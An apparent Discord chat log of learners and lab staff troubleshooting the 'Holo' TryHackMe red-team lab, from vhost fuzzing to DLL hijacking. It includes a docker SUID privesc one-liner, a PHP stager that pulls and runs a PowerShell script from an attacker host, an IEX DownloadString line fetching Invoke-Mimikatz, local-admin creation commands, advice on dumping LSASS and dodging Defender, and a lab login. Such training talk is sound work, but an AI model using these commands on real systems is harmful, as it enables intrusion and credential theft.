#holo-network

Just like instructed

But the drop down menu is empty when I go to select the listener and implant template in the launcher tab

I clicked on the start button, but as soon as I go back to the menu, it goes back to uninitialised

A reboot did the job

@topaz jewel covenant doesn't have the best input handling so if you leave a trailing space in a field it will often crash it. If you cut and paste info like your ip address always check for that prior to hitting enter

Hey guys

anyone here at the point to access to PC-FILESRV0

plenty of people are. Whats your question?

i found the creds of 'wa...' from the previous step

and the we have access to the PC-FILESRV as said in the tasks ... the creds isnt working for me

they work, Ive seen some users have some weird issues with the machines just being funky

try various ways and protocols

From what Ive noticed its just a matter of messing around with syntax until it works for whatever reason

ive been waiting the reset 2 times same issue , i want just to know if im missin smtn like i have the wrong creds

you probably have the right creds. Remote protocols are just funky sometimes

no WinRM , im trying to login from RDP

After 3 excruciating days, I've finally pawned Hololive 😎🙌

Anyone need help, feel free to hit me up

Thank you @lone spruce and team for the challenge, learned alot🙌🙌

Gave +1 Rep to @lone spruce

can someone nudge me on task 17?

Could you be a little more verbose in where you’re stuck, what you’re doing, what isn’t happening, etc

basically cant get around one of the security options that the mysql server is running iwth

you're not connecting to the MySQL server running on the docker container, right?

that explains a lot....

ty

@lone spruce yhank u for ur points , i succeed to login into the PC-FILESRV01 it was a probelm in the machine

hi, i'm not able to reach L-SRV01, it seems to be down...

anyone have same problem?

What subnet are you in?

Hi, I am in Task 47 where you have to weaponize the relay. when i try to do so i get the following error and psexec exits: [-] Error performing the uninstallation, cleaning up. had anyone the same error?

Ok fixed it. I have just used smbexec instead

But i am curious... did anyone stumble across this error? and what is the problem?

I still have no idea why psexec doesn't work in the lab

it worked in dev

:u

yeah, but no problem. now i know that impacket has more tools for rce :)

ad is whack

is there an AV installed on that machine?

there shouldn't be

Hi, I'm not able to reach L-SRV01

which subnet are you ok?

on*

And yesterday when I did reach it my shell died after a couple min

70

hmm, restart the network. I haven't heard of any issues existing with .70

when you ask for my subnet you mean the subnet i'm connected onto via the vpn right?

how do I restart the network?

but still a very nice network. had a lot of fun and learned a lot of new stuff <3

if you scroll up to the network diagram there will be a reset button

with it you can vote for a reset on your subnet

Yep thx

Gave +1 Rep to @river cradle

Actually I'm not on 70, 70 is the subnet my VPN is on, the LSRV01 subnet I'm on is 69

ah, the famous .69

in that case leave the room and re-join it to get assigned to a separate subnet as .69 is a test one that is kinda broken and there are too many people there

I think most have been moved off 69 now

well it still shows 24 reset votes required 😄

Thanks, i was starting to lose hope with holo lol

but yeah most were assigned to other ones

I'm on 150 now but still can't connect to the server

is your network started

yes

did you download new openvpn file, since you changed networks you will need a new file

yes i did

which machine exactly are you trying to connect to and what port

10.200.150.33, port 80, vhost admin.holo.live

did you update your host file

yes

any hints for the DLL hijacking part ive found the vulnerable app

and an article talking about the exploit

but i think the exploitation idea / DLL needed is different

I am stuck on Task 27. Can I chat with anybody who has completed this step?

what specifically are you having trouble w/

after capturing the token, I try to submit it via the url and then refresh ... but I get redirected back index.php

any ideas?

@lone spruce

iirc when you refresh the page it invalidates the token

iirc you just need to populate the user_token field with the one found in the session cookie

yeah.. not sure what I am doing wrong

I wonder if anybody else out had the same issue...

Could you be more specific by submit then refresh?

You should just submit and that’s it

And for every refresh of the password reset page you get a new token because you’re essentially telling the server to reset the password each time you refresh

so the token won’t be the same

I am using Burp and intercepting the request... After I hit "Reset"

I capture the user_token ...

then I simply use Burp repeater to edit the user_token to http://target/index.php?user_token=blahblahbvlah

I have also used it under the Cookie: field of the GET request

Have you tried not using any tools and just shoving it into the url

I have aslo tried it as follows: http://10.200.blahblha/?user_token=3r23r23r23blah

tbh the infrastructure might not like burp I don’t know, I built it, it’s janky

Wait? You’re not using the password reset page?

just shoving it into a parameter?

that’s not going to work

I have tried without Burp also

http://10.200.blahblah/password_reset.php?user_token=34r32434534 ? like that?

Yes

I believe it might also want a user specified as well? I can’t remember

if I do that ... It will redirect me to a page where I can reset the password of the user... is that intended? I dont want to do something that might mess it up for others.

yo uhh, after this my reverse shell commits sudoku,
any reason why?

I'm using a VM, bridged,btw

did u use msfvenon for the reverse shell?

nahh, this is task ...12

I was able to figure it out. Thank you

Gave +1 Rep to @lone spruce

do I have to use msf?

nah..

🤔

dm if you want ... @cedar maple

well- I did use nc rev but I'll poke around with py then

Yes that’s intended. That’s exactly what is supposed to happen

I mean you’re bypassing the password reset page

Summon @wind bobcat

damn, Korone

well it could be likely that someone in your network is doing that tho seems weird

well I think I'll try getting a reverse shell from attack box after few hours

or a network reset might help?

if u got the votes

huh, I have upgraded shells before but this one acts weird for me
the python command does not give me a "half-upgraded" shell,so I can't really use the ctrl+z trick to upgrade it further via stty raw
any ideas?

Have you tried python3?

Task 43: found the vulnerable application stuck in dll hijacking i created my dll but can't overwrite existing dll

if youre overwriting any kind of dll youre doing it wrong

youre hijacking a non existent dll

what can i do to the application use my dll ?

A "User" on the network will run the application

it doesnt specify to overwrite anything

So Id need to add my dll in the application dir then how the application call my dll ?

I can't understand this step

you need to add the malicious dll to the directory where it should be in

in most cases the users Desktop

it also has to have the exact name

the application uses dll when it starts

the dll you are hijacking is called but does not exist

Insted it calls my dll from desktop right ?

therefore when you hijack it and create it the application will call it then execute your malicious code

its not doing anything instead. You are just taking an operation of an application and controlling it. The application attempts to call the dll whether it exists or not

Ok got it,

Thank you so much

Later I'll try it

Yeah,that didn't work

I'll try python3 in morning,and let ya know

I did try to find the dockerenv flag w/o that but no success

Task 8: can't find the domain names of the webserver with gobuster

what am i doing wrong?

You’re attempting to find sub domains with a sub domain

It shows in the output

www.www.Holo.live

that’s way off

try just using the IP

Ur trying to find the sub domain of a website. For ease of use of a scanner what do you think is the best url to supply it with? Especially as u can see it didn't strip off the www.
Learning to debug what a program or code is doing is vital to cyber security testing.

I am on the container machine, where I should be able to make a full tty shell. This command has been given to me python -c 'import pty; pty.spawn("/bin/bash")' but it doesn't work, I don't get a full tty shell

also /bin/bash -i or python3 doesn't work

@zenith delta try python3 -c 'import pty; pty.spawn("/bin/bash")'

Also didn’t worked for me from the initial shell.. I had to create msf payload from there I used python 3 version

Good workaround nice

thanks figured it out

Gave +1 Rep to @limpid hollow

Finally finished, this really was an amazing network. Had to read a little from wreath but was able to bypass the av, special thanks to @whole falcon who helped me out a lot.

https://tryhackme.com/Vikaran/badges/hololive

Gave +1 Rep to @whole falcon

hey guys, can anyone please do a reset to holo network

Which subnet are you on?

10.200.151.X

Task 12
I found the parameter that is vulnerable to RCE thorough source code, when I tried to do the same thing with wfuzz it kept giving me the 404. I don't Understand whats wrong with my command so, can anyone help me
wfuzz -c -b ||"PHPSESSID=ut2b55qbm289jijn06b4lij6po"|| -u http://dev.holo.live/||dashboard.php||?FUZZ=ls -w Temp/test

The word list has only one word and I even tried this with burp intruder and it worked perfectly i.e gave me the status code 200, with variable length

because you're fuzzing the wrong subdomain

what

oh no

lol

Yup wrong subdomain 😅

Task 21 Cracking all the things, I need to crack a sha512crypt hash. I use the following command hashcat -m 1800 hash2 /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou-75.txt

I am not able to crack the hash

Try the full List. rockyou.txt

I am using that now ; ) but I already wait like 5mins

@pulsar field

I waited about 30-40 until it was cracked ... Get Coffee/Tee and wait 😦

dammm

I will wait about that time too then haha, thanks

Tis why we suggest colabcat

I ended trying to crack the root hash for some reason 😂 when i was doing the room and i waited like 40 mins for it and realised that i was doing it wrong

RDP on PC-FILESRV down ?

is it closed on an nmap scan

if not then no

check your syntax

if its still not working move to another protocol

The nmap scan isn't working for me, all hosts on the network are down , Am i doing something wrong or is it a bug ?

i had access to it yesterday

proxychains xfreerdp /u:XXXXX /p:'XXXXXXX' /v:10.200.142.35

but not anymore

I dont know, reset the network

1/3 need 2 more votes if anyone here has the same prob reset plz

you get one reset every hour

it is also helpful to note what subnet youre on

the same state i had yesterday everythng looks the same and it was working smoothly

but not today

im almost at the point of finishing the room one flag left

I cant access the holo network for some reason, can anyone help me?

Hey guys I am facing an issue with socks4 part and proxychains

It worked nicely while wreath

Check if your network is started

You added wrong IP in the etc hosts it should be 10.200.153.33

whats the issue

Hy everyone ! I'm trying to privesc using SUID on the "L-SRV01" but when i follow the instruction on gtfobins, they tell me to set the passwd for the user "www-data" but i didn't have the passwd for this user. So maybe i miss something ? any Hint? (task 19)

They’re windows boxes they don’t respond to ping

Are you sure you’re using the right exploit?

There are multiple on that page

It sounds like you’re attempting to use the sudo exploit

I'm using the right exploit, i already answer the question on the task so i'm pretty sure that i'm using the right one but when i try it, the revshell ask me for a passwd even if i'm in the www-data user so i don't know what i missed.

I am sorry I was stupid and my proxychains.conf had one single quote lying around which made the whole conf to not work. Now, It responds to my crackmapexec

If it’s asking you for a password are you sure you’re using the right one?

Could you send the exploit in spoilers here?

sudo install -m =xs $(which docker) .

./docker run -v /:/mnt --rm -it alpine chroot /mnt sh

You’re attempting to copy and paste an exploit without any idea what it does

look at the exploit

understand what’s it doing

you have an entire line that isn’t needed

Ok, thanks for the help ! i'll try harder

ugh I'm stupid,
what's the reason that my term won't go ahead with reset after stty raw -echo and then fg, any ideas?

I had that happen the other day and I really don’t know

Ah I know why

Looks like you’re using kali, kali’s shell is now zsh. You need to follow the zsh instructions which specify a small tweak

ah,that makes sense, I'll try that

oh yeah that worked, thanks!

now, to find the damn SRV02 flag

Can anybody help me with AV evation?

I understand ASMI now (I guess?)

But I don't understand how to compile ThreatCheck

Or use grunts

Or use Covenant

And the walkthrough is kinda rusty

Anyone who has completed Holo and is open to DMs?

Problly saupki-chan

Or cry

It's too early to cry, I usually schedule my crying sessions into late night.

I better wait for Saupki to come online

Cry == cryillic

Oh 👉 👈

@lone spruce @wind bobcat anyone open to DMs

L-SRV01 down?

L-SRV01 certainly appears to be dead on my network, but apparently I've joined the test network on 10.200.69.1/24 and am unable to escape to a normal network

Been a bit of a rocky experience so far, anyone got any suggestions on how to proceed?

Well it's because people nuke the initial webserver. Go for a reset. That's the only way out guess.

i usually only see 1/3, damn

Bruh

26 people

check pins

Aye, leaving and re-joining wasn't working, Skidy fixed it though 🙂

If not anyone else answered, you can dm me

Where exactly are you confused. It can help use make it better if you explain more

Yes you can? Just leave the network and rejoin. That subnet is trashed

I left .69 multiple times and kept being re-joined to it today when joining back into the holo room, but my issue has been resolved now anyway 🙂

That’s wacky

should’ve put you into a new subnet

Did you join before it was publicly launched?

I'm not entirely sure, it's possible as I've been testing the network for use at work, Skidy might have joined me to the network before release but it'd be best to confirm that with him

I had previously left .69 a day or two ago, but attempted to join Polo on his network and got dropped back into .69 and was trapped there

Well the whole grunt part is confusing, partly because Windows is not my Domain

Thanks @pulsar field I'll make it quick

Gave +1 Rep to @pulsar field

How do I compile the ThreatCheck 🙂

reported to Skidy. We must've hit the user cap again. We're reporting -2942 users in the room so something's up to say the least, lol

1. Git clone or download the Zip and unpack it. 2. Import the sln file in Visual Studio 3. There in a Menu Build. That builds it. Build Solution

Aah thanks. I didn't know that 😄

iirc grunts are just fancy words for listeners for c2 channels

ex. SMBGrunts are listeners that communicate over smb

I need to start working on my WIndows skills this fall

@wind bobcat any good resources to get started with windows for a beginner?

I also need some. After windows fundamentals 1,2,3

Let me know biggus if u get some. I heard some itprotv courses are good

And here is something I found but the links to windows resources are borked

https://github.com/DFIRmadness/5pillars/blob/master/5-Pillars.md

It’s specified in one of the very first tasks

Yeah but my Dev environment is very very shitty. Nevermind, I'll figure out something

What do you mean shitty

you can pretty much run vs on anything

I’ve compiled shit on my beat up who knows how old laptop that doesn’t work half the time

compiled binaries 👀 there was a github link to it

https://github.com/Sq00ky/Compiled-Binaries

:)

Re-Ping

PC-FILESRV01 down ?

i have no more access to it

even after reset

if anyone can check plz

We can’t really just check if a machine is up or down

are you trying to ping it?

If so it’s probably not going to work because it’s a windows machine

it’s also behind a pivot so make sure your setting up your proxy

Hey everyone

Having some issue connecting to the webpage ad.....live is there an issue with the docker?

Have you added the domain to your /etc/hosts file?

yep

i can see the page i was able to do a reverse shell but lostmy connection

@high salmon if you try leaving and rejoining you should be put in a new network

same happend with me also i just left it for some time , its working fine now

any one active here ?

@wind bobcat

pong

iam in task 20

i got this error

Unable to find image 'alpine:latest' locally

pebcak

can you help me out

read what the command is doing

don't just copy and paste it

okok

can someone dm me i need some help with task 18

Bleep bloop encoder url your ncat commande from what i can see.

huh

nvm i figured it out i forgot to edit the ip in the bash file lmao

hmm L-SRV01 down again.

intresting.

what do you mean by down?

you cant ping it if thats what u mean

good day guys

i have trouble with subdomain enum. Trying to fuzz with gobuster but nothing's found. Anyone who had the same?

can you post your full command, please?

sure

gobuster vhost -u 10.200.161.33 -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 35

I can tell you i immediately see a problem with your command

what's the problem

domain name > ip address 😉

there were no domain names for the ip address mentioned

take a peak at L-SRV01 and poke around

i tried configuring holo.live as the domain name in /etc/hosts but it did not work

how do you mean it didn't work?

the answer to T9Q1 is what needs to be in /etc/hosts, not holo.live

it found like 2 vhosts but when i tried to check them it did not work

again, how do you mean it didn't work?

like their port 80 was down

that shouldn't be the case. they're all running off of the same server

ikr, I just set up a domain name of holo.live to the ip address

Ikr but I don't know what's going on

if you try
curl http://10.200.161.33/ -H "Host: dev.holo.live"
do you get a response?

yes! funny thing is when i try to enter the web server with the domain name 'holo.live' it just doesn't show up

and how is your /etc/hosts file formatted?

it should look like so
||10.200.161.33 www.holo.live admin.holo.live dev.holo.live||

dang, why www.holo.live instead of holo.live? I think I have a gap in that area

the primary domain name holo.live is reserved for the domain controller

it's like that in all AD environments

oh so www one is for the webserver , gotcha?

correct

thank you so much!

hey there

anyone having a trouble getting a reverse shell at t13

solved in already

Can we retake the room after it is finished?

Yep, if you go to options > reset room

ty

Is the holo network access limited to 10 day only.. can i use it after 10 day

anyone else having issues trying to access the network?

~~is network up and running. is vpn good and connected? ~~ just to be sure

yessir

hopefully i didn't dox my public ip but

You can rejoin after access is up, the 10 days is just so it frees up space on the networks

ooo.. thanks.. you mean after 10 days it's hard reset like deleting files and logs ..

Gave +1 Rep to @glacial temple

For the docker escalation,?

Question do we have a lab where i can work on for that part? like Docker rodeo?

i think yes.. search for docker you will find some

No, all of your progress stays your vpn connection just expires

@lone spruce

It’s already fixed stop ponging me

Hi i am doing holo netwrok and on task 9 i have completed the vhost discovery part using the seclist wordlist which was recommended but still did not get the two domains

using gobuster

can we see the command you used?

opps i saw the old chat and i realised my mistake

well, in task 8 there is a nmap -sV -sC -p- -v 10.200.x.0/24 --min-rate 5000 command and before it is stated that 10.200.x.0/24 is in scope - how should I interpret the x?

the x is the subnet you are on.

Hello, can any one help me in the AV Evasion section, i have some questions about it 🙂

so sorry to ping again, but there is another double text on task 19

How the hell?

I know I didn’t place that many errors there

@outer junco this wouldn’t happen to be on your dev side would it?

@wind bobcat you do something?

@lone spruce I also want to report a bug, i don't know if its from my part. After getting the first shell from the admin page everything is great but if that shell is stopped admin.holo.live won't work until the network is reset.

i can do a video on it after the network resets if you want

after login the admin page is in an infinite loading loop

nope\

That sounds like an @wind bobcat problem

known issue. clear cache or open in an incognito tab.

works! thanks

Ah forgot about that

well, I thought about it, but I have 10.50.X.Y IP not 10.200

for future users:
When getting the second shell don't forget to put the "python3 -c "import pty;pty.spawn('/bin/bash')" even if the terminal shows who you are and you don't think u need it

I spent 2 hours on the suid with the (no tty) error

dont be dumb like me

hm, also I did have Nmap scan report for 10.200.169.33 [host down] but the correct first answer is 33 for the last octet (for me it was 250 one that is up)

maybe I'm doing something wrong

the IP Addresses referenced in the diagram (see screenshot) is the scope for the network. Yours will be different. user subnet != network subnet

that one is understandable - but then, what I'm doing wrong, can I DM you to not spoil for anyone? for me the host that suppose to be up, is not responding (first answer, task 8)

if the host isn't responding

1. Try resetting the network. You can submit additional resets every hour
2. Leave and rejoin the room. You'll likely get placed in a new network

hm, ok - but what about other host that I've discovered (.250)? is it a part of network? maybe in my network it is just under different IP?

That’s not how it works

it’s a VPN gateway

it’s out of scope

well, I'm gonna then reset or change the network later then

thanks 😉

Hello, I'm at task 13 where im fuzzing for parameters and i used wfuzz and got results as well the output is way too long is there a way for me to refine it ? --sc is not working right for me

i used --sc 200 but none of the outputs were right or matched the answer in the answer field

Hey man I have an issue with uploading mimikatz.exe using the upload feature on covenant

I think AV is doing something something with it

Please ignore this message as I changed pass disabled av and did it that way and brought the av up after I am done

That works for now

I screwed it over

My hash got screwed

but just a note if you’re looking to write a report we’re not looking for “I turned off AV” we’re looking for the most unique approaches to getting around AV

I am not going for any reports

I changed the password and now the hash is not working any more

This isn’t my forte so correct me if I’m wrong but have you tried getting rid of the ls la?

yup i've tried other commands like whoami, uname ,echo etc the linux shell commands works just fine but the tool doesn't give the proper result

@lone spruce can I dm you

Can somebody verify my hashes

I have the hashes dumped using mimikatz and now struck

As spraying does not work

Why are you spraying hashes?

I mean I can’t say I’ve memorized the entire attack path but I don’t remember password spraying?

Have you tried getting rid of it all together and just going off of fuzz?

I mean pass the hash

With crackmapexec

@wind bobcat Hey I am struck at the part of crackmapexec pass the hash section

I have changed the password of Administrator on S-SRV01 and disabled AV does changing the password screwed it up

that's Cry's section.

Can you please vote reset on my instance

I cannot

I do know that you don't need a Admin hash, you need a domain users hash

Okay but that does not work can I dm you the hashes to verify if its correct

The hash that you get should be correct. It's loaded into memory via autologon via a password we explicitly specified.

in Mimikatz if you do a sekurlsa::logonPasswords, you should probably see the cleartext password someplace in there

and for future reference, you always want to add a user account during an engagement. Never change the password.

net user newuser Password123! /add
net localgroup Administrators /add newuser

Yeah I was like very desperate at that moment and it slipped out of my mind

And Now, I want to die as for like 3hours I was copying the SHA hash instead of NTLM

Yup that too , then it just gives me allllll these results and idk which one is the successful request, theres way too many to sort through which is why i want to sort by the response code T__T been like 5 hours since i started with this thing

@wind bobcat ree spooks this is you

you are specifying the cookie though, right?

because the reason you wouldn't be seeing different character lengths is because of the lack of a cookie. It's behind a login portal, remeber

No cookie for you

Hi people, need a little help here

I created this payload for the file upload on S-SRV01

<?php
  function get_stager() {
    $init = "powershell.exe";
    $payload = "Invoke-WebRequest http://IP/rs.ps1 -outfile rs.ps1"; // Insert PowerShell payload here
    $execution_command = "shell_exec";
    $query = $execution_command("$init $payload");
    echo $query; // Execute query
  }
 function execute_stager() {
  $init = "powershell.exe";
    $payload = ".\rs.ps1"; // Insert PowerShell payload here
    $execution_command = "shell_exec";
    $query = $execution_command("$init $payload");
    echo $query; // Execute query
 }
  get_stager();
  execute_stager();
  die();
?>

The file uploads successfully but isn't executed

Not even the request is made

Any guesses what I am doing wrong?

Have you "called"/access it?

I tried SERVER/db-shell.php but nothing

has Powershell reached out to the web server?

by to the web server, I mean yours

Not really

so no?

Nevermind, I was requesting the wrong path

But the revshell payload failed

I used Chimera

If the reverse payload failed, maybe try with AMSITrigger if its detected from AMSI as malicious

I used level 4 obsfucation in Chimera, lemme try that again

usually just obfuscating it wont fully bypass defender

it can but you have to craft a decent payload

also as always we suggest checking that the payload works on your own host before just going and blowing it on the production server

if the payload itself doesnt work then its not going to work in the PHP

Oh my god, i'm so dumb, Thank you so so so much for this @wind bobcat

Gave +1 Rep to @wind bobcat

Is it "legal" in the Pentest report if I disable ASMI altogether?

there are no restrictions per say to the report

were just looking for the most unique ways of evading detection

ideally you are as quiet as possible and stealthy

so disabling AMSI would not be recommended

Hey man I cant get the task 39 which asks for av data

The event logging and av product

I ran sharpedr

But can't find a thing to fit the answer

its sysmon

I blame spooks

Are you kidding me mate

4 chars av product

I know its Windows Defender

thats on the device

I know that for a fact

So I am trying to get Mimikatz on the machine with

IEX (New-Object System.Net.Webclient).DownloadString("http://IP/Invoke-Mimikatz.ps1")

But not even the request is being made

Any ideas what I am doing wrong?

PS: I can download other stuff, just this particular one errors out

Okay, nvm I changed the name and it worked

Still can't get mimikatz up

Low-key wanna kill defender

Wrong channel dude

Yeah I just realised lol idk how I ended up here

Sorry!

Anyone who successfully dumped LSASS creds?

Hi, on task 10. Fairly confident I have found the file that loads images for the dev domain. It's an empty file though. Guessing someone is playing silly buggers. Any admins that can restore? Or do I need to get the votes to reset?

I think it could be needed for task 12, what file from the information leak?

If not I will keep searching?

how do you mean it's an empty file?

@wind bobcat !!!! Be my savior

Cry is responsible for the middle of the network

How do I dump LSASS creds

sekurlsa::logonPasswords

secretsdump.py

Oh boi I am crying

Stupid Defender

It's removing all mimikatz things

secretsdump.py is your next best bet

I guess the box doesn't have python

g.* is 0 bytes.

it's not a local tool, it's a remote tool

the specific url you're accessing, please?

don't worry about spoilers since this is a guy did not work

Ughh but doesn't secretsdump require some sorta creds?

guided* speech to text ftw

yes local admin access which you need for mimikatz as well lol

if you have local admin access, you can create a local admin

The Cycle of Life

dev.holo.live/img.php

you're missing a parameter.

that's why lol

go look at the actual images that are loading on the web page

Roger 😂

I was reading it wrong 🙈 I was hoping for a topology

Any ideas of how to be sneaky? :(

you really don't just clean up after yourself

if you want to be extra

dump the lsass process and parse it manually offline

Aah sure

but that's work

i would just create a local admin, dump creds, remove the user, and be on my way.

I wanna write a good report for the Pen-300

@wind bobcat you there?

hm?

@woven lava it helps if you be more verbose in your questions rather than please help defender Bork. Specify what you’ve tried, where youre stuck, etc

I have tried:

• The Mimikatz Binary(which gets removed)
• The Mimikatz Powershell script(which isn't invoked)
• I've tried various obfuscation methods but all failed(Including CustomKatz)

I tried adding another user but am pretty sure the syntax is wrong somewhere when using secretsdump.py

Have you tried following the course guidance?

The same steps taken to evade with covenant can be used on any tool

Have you tried researching evasion techniques

I used Chimera because Covenant was too complex for me.

And yes, I tried researching tools and even tried a bunch of them

Seems like you really just need to reread over the tasks and do some more research

not a lot we can do for you

I Just dump lsass with rundll32 + a dll I forgot (it’s on hacktricks) and sam/system with reg save to an smb server on my Kali and call it a day

It's pretty late back here. I'll let you know tomorrow

You’ve got time don’t worry about running through it super fast

take your time and pick up on some new concepts

This is a perfect primer for Pen-300

I'd say most of what you're doing here is harder than pen-300

https://tenor.com/view/thumbs-down-you-adam-sandler-gif-14612875

when was this network released

soft released 2~ weeks ago

official release, 2 days ago

I have got a plan but I'm getting the syntax Wrong I guess

This might be be stupid

But when I add a user(Assume username to be db) it is listed as:

.......
HOLOLIVE\matt
db
.......

What does HOLOLIVE signify?

And how do I add my user to the group?

Holo live specifies the domain

And a decent google question

TLDR you don’t have permissions because you don’t control the domain

Aah that might explain why I can't use secretsdump

Just a side Question: Disabling Defender is a lot of noise, so how about excluding a particular folder? Is that stealthier somehow?

(If I delete it later)

We’re looking for unique approaches not the easy way out

Hi All i need small hint/ help about task 15 i have got the shell and now according to the task i have to sumbit flag but i am unable to do so

little confused because there is nothing in home directory

ok so me again - now that .33 server responds - so what that x means in 10.200.x.0/24? yesterday I've performed an nmap scans using bash for loop (nmap 10.200.0.0/24, 10.200.1.0/24, 10.200.2.0/24, etc) - but maybe I should know what x is at this time

Hey, can we vote for resetting the network? I messed up with stabilizing the shell 😦

wait a bit 😛 i'm running that massive scan

and Ithink you have that here

another question: does it mean after few days I won't be able to complete it? or is it only counting my premium membership?

Hmmmm

@fading jungle is your premium membership expire in 8 days?

yeah, thats prbably it 😛

ok I'm fine with resetting you can do that

I'm pretty sure we're on different networks 🙂

if that's even possible

Can someone help me on the dll hijacking??

Its better to ask your question specifically @real talon

I can't do the dll hijacking

@hollow linden I could show you what I have found so far

This is all I found

This is all i have got

Now I made a dll using covenant and renamed it to a the not found dll and put that thing at the place of the binary @wind bobcat

Hello guys! I have a bit of a road block for the fuzzing part. I am using gobuster for the vhosts scan on the attack box with the /etc/hosts/ edited to have 10.200.175.33 FQDN but all i get at the end of the scan is garbage.......I am looking for
What domains loads images on the first web page? and used the following command gobuster vhost -u FQDN -w (the recommended one). Any idea as to what i am doing wrong?

did you write literally FQDN in the /etc/hosts or this is just a placeholder to hide spoilers?

and are you sure that IP address is ok? I'm just asking because you can be at later task or I don't know sometihng

you're still in cry's territory

Yes I am crying really hard😢

:L

you can try the other method from task 43, metasploit.

That yet does not work

Can I dm you ??

ok

i've been waiting for 10 minutes and i cant find anything useful on the internet

any ideas?

you can run it with dotnet run --project=/path/to/folder

i tried, and it doesnt work

i figured i had to build it first, and that doesnt work aswell

do you have the sdk's installed?

yes, look at the first commands

hmmm

ur already root but maybe try sudo?

tried that now, but it seems im still in an infinite loop

maybe i ll just use empire lol

What was the error

this is the source of the problem

There is no error, only an infinite loop

if i try to open the 127.0.0.1:7443 in a browser it doesnt work

Why are you using 3.1.4?

Are there any good Resources to "obfuscate" DLL?

thats where task link redirected

Think of your dll no different as you would your payload

to SDK 3.1.411

No

It directed to a 3.0.x download site

encoding is going to be your best bet if you don’t want to clean code. This is why we suggest cleaning covenant to begin with because it makes things like making a DLL that evades AV super easy

am i doing something wrong?

Yes

it does say 3.1 on the task, Cry

It says 3.1.0

look at the video

hmm, I see

yeah, you need to scroll down on the page

Scroll down. Do you always just look at a site and click the first flashy button you see

its all the way att eh bottom

Hi Asentinn. I did put it in the etc/hosts/ and tried to ping to make sure it works. and it does. Also is task 9 so I am only at the first server now

Ok, may I dm ?

when its about downloads, yes lol

I would prefer we stay here it’s easier for my sanity and to help others

@wind bobcat I need to go back to bed and wake up less grumpy

Send nana pics

Wait

pity we dont have threads on this server - do you want to move to DM? in short - FQDN is an acronym for Fully Qualified Domain Name - so you should put in the /etc/hosts the actual host name (you can find it using differen discovery tools)

spooky my dog has the same collar and leash

hhHhh

It’s the directory the DLL is supposed to be in not the binary

they differ

@zenith delta also as long as I'm not mistaken *.175.* is not a correct ip for that part - did curl 10.200.175.33 returns you anything?

I suggest trying something more manual

Its a "bypass", I finished the Lab and I play a little bit 🙂 I don't want to spoil for anyone.

That range is fine

I have a question for sb here, about fuzzing - can I DM someone?

Ah okay, go ahead and DM me

ahh, ok for me it was different IP

there are a bunch of subnets

probably different subnets for different ppl

you just solved it. thx alot.

Gave +1 Rep to @fading jungle

I want to talk a bit about fuzzing binary responses

Now, This is happening @wind bobcat

So i uploaded the the php wrapper, but it doesn't show up in covenant after executing the file

if you type in socks do you have any sessions?

and you can access 10.200.151.30 without any issues?

connection reset typically means you cant

did you test your payload on your local testing machine prior to just throwing it up

yes, had to modify the profiles and such because threatcheck detected it

just becuse threat check says its clean doesnt mean it is fully

did you actually test against defender?

no, let me try that

there is one specific function that typically gets picked up but threat check doesnt see it

defender didnt find anything

How did you write your wrapper

i had to add a GIF-header to my php file because the webserver errord whenever i tried uploading it without that header

waiit lemme grab it

that’s probably going to be your problem

I suggest looking at other ways to bypass it

there is a section in the room depicting what to do if you’re not sure

aah ok will look into it!

thanks 😄

?

?

?

?

?

?

Btw, I cracked the hash of the user on S-SRV01. However Task 37 asks for a hostname and a flag, and I couldn't figure out either

Any help?

I can't seem to get on Fileserver01

that's because it's not fileserver01

I can't seem to get on Fileserver01

I've tried spraying but to no avail :(

Well I can get on S-SRV01 with credentials I got

But then, how do I get on FILESRV01?

What is the full path of the credentials file on the administrator domain? Can someone DM me the gobuster command for this please?

you've compromised S-SRV01, right?

like, dumped credentials and all?

Yes.

I am all done till task 36

Now, when I spray the network with the credentials, only S-SRV01 is successfully pwned

Just use regular go buster directory syntax but with a domain

@lone spruce can I DM you a question? It got certain spoilers otherwise I would have dropped them here.

I'll take just a minute.

Hi

admin.holo.live is not working i am using right creds

can someone help

what creds are you using?

or at least check if it is issue on my side

DBManagerLogin!

admin:DBManagerLogin!

that should work. Best advice I can give is to reset the network

reset network votes are not enough

you get one reset every hour

okey thanks i guess wait is best option

if you'd like to explore an additional exploitation path, the dev subdomain is also vulnerable to RFI

aha great

question: in task 16 we are given the second IP right away (||from the internal network, 192.168.100.1||) in the example code snippet - did I missed something ||or the IP that we are provided 192.168.100.1 is the gateway IP from the networking knowledge?|| I can get the private ip of the current environment I'm in with ||ifconfig||, that I'm aware of

also on my server ||/dev/tcp doesn't exist, nor anything is returned from nc scan|| - does it mean somthing went wrong and I should reset the network?

Im having issues with task 37. I was able to get the hash which seemed to work on SMB for PC-FILESRV01 but not WINRM for PC-FILESRV01

why don't try other Protocol to get in, instead of winrm?

ah i finally got the other protocol to work, thanks!

Gave +1 Rep to @pulsar field

protocol? 👀

rdp?

Has any one done the docker privesc (Task 20)? I think I know what I need to do, just not sure how to execute it or construct the syntax. I'm thinking make a dir on the host, then mount the docker to it, giving me root?

Why would this not work with the SUID bit set?

docker run -it -v /:/mnt alpine chroot /mnt

Do I need to build my own docker image first?

no, there is an image , check which image is available...

and in your docker command -check GTFOBins- is the sh missing at the end

Thanks, looking now

Gave +1 Rep to @pulsar field

The box is down. I will try later.

In task 39 we are asked the names of the monitoring and the logging software but both Seatbelt and SharpEDRChecker fail tor read some drivers or something

How do I get the answers? 😦

/dev/tcp does exist -- it exists in the form of /dev/tcp/ip/port

what is your opinions about holo network?

idk i find it sometimes like jumping to a topic and not explain it well just my opinion atm

If you find something like that then just tell us and provide us feedback so we can improve it

well i didnt write it in an offensive way just my thoughts

neither did I. We just want to make the best experience possible so if you think an area needs work just let us know

well i will complete the room and then provide feedback where i can write my feedback?

https://forms.gle/emezVyqnw7yxhT7m7

@wind bobcat Im just putting this here for now. If you want to move it I dont care

ls /dev/tcp returns nothing, actually listing /dev content didn't return tcp - do you mean I can't see /dev/tcp, but can refer to /dev/tcp/ip/port? still, nc won't return anything

it shouldn't because it's a socket

it's not a file or a directory

it's a physical device

but.. but "in linux everything is a file" 😛 I though this would be the same

it is, but it's not

ok, so I gues everything is ok, and probably nc doesnt work here and I should scan with different technique

Hey guys, need a little help with the name of the vulnerable application found on PC-FILESRV01

I got the Scheduled Task thing

But "which one"

I couldn't find it when I listed the scheduled tasks, even after restarting the whole network a few times. I went to check the windows event log and apparently it is bugging out.

Like failing to start because it is still in progress, and there were multiple instances of the vulnerable application running

So how did you finally narrow it down?

